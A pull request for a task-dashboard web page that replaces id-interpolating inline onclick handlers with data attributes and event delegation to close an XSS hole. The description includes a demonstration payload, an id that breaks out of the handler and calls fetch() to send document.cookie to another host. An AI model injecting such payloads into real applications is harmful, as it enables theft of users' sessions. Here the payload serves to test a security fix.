### PR TITLE
Replace data-bearing inline handlers with event delegation

### DIFF
--- a/public/index.html
+++ b/public/index.html
@@ -1962,7 +1962,10 @@
       }
 
       container.innerHTML = activeTasks.map(task => `
-        <div class="live-item" onclick="openLiveTask('${task.sessionId}', '${task.id}')">
+        <div class="live-item" role="button" tabindex="0"
+             data-action="open-live-task"
+             data-session-id="${escapeHtml(task.sessionId)}"
+             data-task-id="${escapeHtml(task.id)}">
           <span class="pulse"></span>
           <div class="live-item-content">
             <div class="live-item-action">${escapeHtml(task.activeForm || task.subject)}</div>
@@ -2152,7 +2155,7 @@
       const tooltip = [timeDisplay, gitBranch ? `Branch: ${gitBranch}` : ''].filter(Boolean).join(' | ');
 
       return `
-        <button onclick="fetchTasks('${session.id}')" class="session-item ${isActive ? 'active' : ''} ${isArchived ? 'archived' : ''}" title="${tooltip}">
+        <button data-action="select-session" data-session-id="${escapeHtml(session.id)}" class="session-item ${isActive ? 'active' : ''} ${isArchived ? 'archived' : ''}" title="${tooltip}">
           <div class="session-name">
             <span>${escapeHtml(primaryName)}</span>
             ${hasInProgress ? '<span class="pulse"></span>' : ''}
@@ -2180,7 +2183,7 @@
       // Create header with delete button
       sessionTitle.innerHTML = `
         <span style="flex: 1;">${escapeHtml(displayName)}</span>
-        <button class="icon-btn icon-btn-danger" onclick="deleteAllSessionTasks('${session.id}')" title="Delete all tasks in this session">
+        <button class="icon-btn icon-btn-danger" data-action="delete-session-tasks" data-session-id="${escapeHtml(session.id)}" title="Delete all tasks in this session">
           <svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2">
             <path d="M3 6h18M19 6v14a2 2 0 0 1-2 2H7a2 2 0 0 1-2-2V6m3 0V4a2 2 0 0 1 2-2h4a2 2 0 0 1 2 2v2"/>
           </svg>
@@ -2231,7 +2234,10 @@
 
       return `
         <div
-          onclick="showTaskDetail('${task.id}', '${actualSessionId}')"
+          role="button" tabindex="0"
+          data-action="show-task"
+          data-task-id="${escapeHtml(task.id)}"
+          data-session-id="${escapeHtml(actualSessionId)}"
           class="task-card ${statusClass} ${isBlocked ? 'blocked' : ''}">
           <div class="task-id">
             <span>#${taskId}</span>
@@ -2396,7 +2402,9 @@
 
         <div class="detail-section note-section">
           <div class="detail-label">Add Note</div>
-          <form class="note-form" onsubmit="addNote(event, '${task.id}', '${actualSessionId}')">
+          <form class="note-form" data-action="add-note"
+                data-task-id="${escapeHtml(task.id)}"
+                data-session-id="${escapeHtml(actualSessionId)}">
             <textarea id="note-input" class="note-input" placeholder="Add a note for Claude..." rows="3"></textarea>
             <button type="submit" class="note-submit">Add Note</button>
           </form>
@@ -2570,6 +2578,48 @@
     }
 
     document.getElementById('close-detail').onclick = closeDetailPanel;
+
+    // Delegated handlers. These replace inline onclick/onsubmit attributes that
+    // interpolated task and session ids straight into a JS string inside an HTML
+    // attribute -- two nested contexts that HTML escaping cannot secure, because
+    // the parser decodes entities before the JS is compiled. Ids now travel as
+    // data-* values and are read via dataset, so there is no JS to inject into.
+    function dispatchAction(el, event) {
+      const { action, taskId, sessionId } = el.dataset;
+      switch (action) {
+        case 'show-task':            showTaskDetail(taskId, sessionId); return true;
+        case 'select-session':       fetchTasks(sessionId); return true;
+        case 'open-live-task':       openLiveTask(sessionId, taskId); return true;
+        case 'delete-session-tasks': deleteAllSessionTasks(sessionId); return true;
+        case 'add-note':             addNote(event, taskId, sessionId); return true;
+        default: return false;
+      }
+    }
+
+    document.addEventListener('click', (e) => {
+      // closest() already resolves to the innermost [data-action], and this
+      // listener is on document, so a nested action dispatches exactly once --
+      // no stopPropagation needed, and adding one would break other listeners.
+      const el = e.target.closest('[data-action]');
+      if (!el || el.tagName === 'FORM') return;
+      dispatchAction(el, e);
+    });
+
+    document.addEventListener('submit', (e) => {
+      const el = e.target.closest('form[data-action]');
+      if (el) dispatchAction(el, e);
+    });
+
+    // Task cards and timeline rows are divs, so they get no keyboard activation
+    // for free. role="button" + tabindex are on the elements; this supplies the
+    // behaviour those roles promise.
+    document.addEventListener('keydown', (e) => {
+      if (e.key !== 'Enter' && e.key !== ' ') return;
+      const el = e.target.closest('[data-action]');
+      if (!el || el.tagName === 'BUTTON' || el.tagName === 'FORM') return;
+      e.preventDefault();
+      dispatchAction(el, e);
+    });
 
     document.addEventListener('keydown', (e) => {
       // Ignore if typing in input/textarea
@@ -2791,7 +2841,10 @@
 
         return `
           <div class="timeline-row"
-               onclick="showTaskDetail('${task.id}', '${actualSessionId}')"
+               role="button" tabindex="0"
+               data-action="show-task"
+               data-task-id="${escapeHtml(task.id)}"
+               data-session-id="${escapeHtml(actualSessionId)}"
                data-subject="${safeSubject}"
                data-created="${task.createdAt}"
                data-updated="${task.updatedAt || task.createdAt}"


### PR DESCRIPTION
Follow-up to #25, and the half of the XSS that escaping genuinely cannot fix.

## Why #25 isn't enough

Six render sites interpolate ids directly into inline handlers:

```js
onclick="showTaskDetail('${task.id}', '${actualSessionId}')"
```

That's a **JavaScript string nested inside an HTML attribute**, and HTML escaping cannot secure it — the parser decodes character references *before* the JS is compiled, so an escaped `&#39;` decodes back to `'` and closes the literal anyway. Escaping the value isn't a weaker fix here, it's not a fix at all.

## Demonstrated

With a task whose `id` is:

```
1'); fetch('//127.0.0.1:9999/?c='+document.cookie); //
```

**Before** — the card renders a real inline handler, and the request fires on click:

```
onclick="showTaskDetail('1'); fetch('//127.0.0.1:9999/?c='+document.cookie); //"
xssFired: true
```

**After** — the id is inert `data-task-id`, there's no inline handler on the element, and clicking every card on the page fires nothing:

```
hostileHasInlineOnclick: false
xssFired: false
```

## The change

Ids travel as `data-*` attributes; one delegated listener on `document` resolves them. `closest()` returns the innermost `[data-action]` and the listener is on `document`, so a nested action dispatches exactly once — no `stopPropagation`, which would otherwise break unrelated listeners.

Converted: live update items, session rows, the session bulk-delete button, task cards, the note form, timeline rows.

**The other 31 `onclick` attributes are left alone.** They're static string literals with no interpolation and no injection surface. Touching them would turn a security fix into a refactor.

## Accessibility win folded in

Task cards and timeline rows were `div` + `onclick` with no `tabindex` or `role` — **unreachable by keyboard entirely**. Since this rewrites those exact opening tags, they get `role="button" tabindex="0"` and an Enter/Space branch in the same delegated handler, rather than a second PR touching the same lines. Verified a card now takes focus and Enter opens the detail panel.

## Regression check

Session select, task card click, note submit (no navigation, input cleared), timeline row click, and keyboard activation all verified working. No console errors.

## Relationship to #24

Complementary rather than overlapping: #24's server-side id validation stops bad data entering, this removes the sink. Either alone closes this particular payload; both is better.

## Conflict note

Touches the `renderSessionItem` opening tag, so it will conflict trivially with #21 if that lands first (`fetchTasks` → `selectSession`). One-line resolution in either order — I hit exactly that when merging locally.
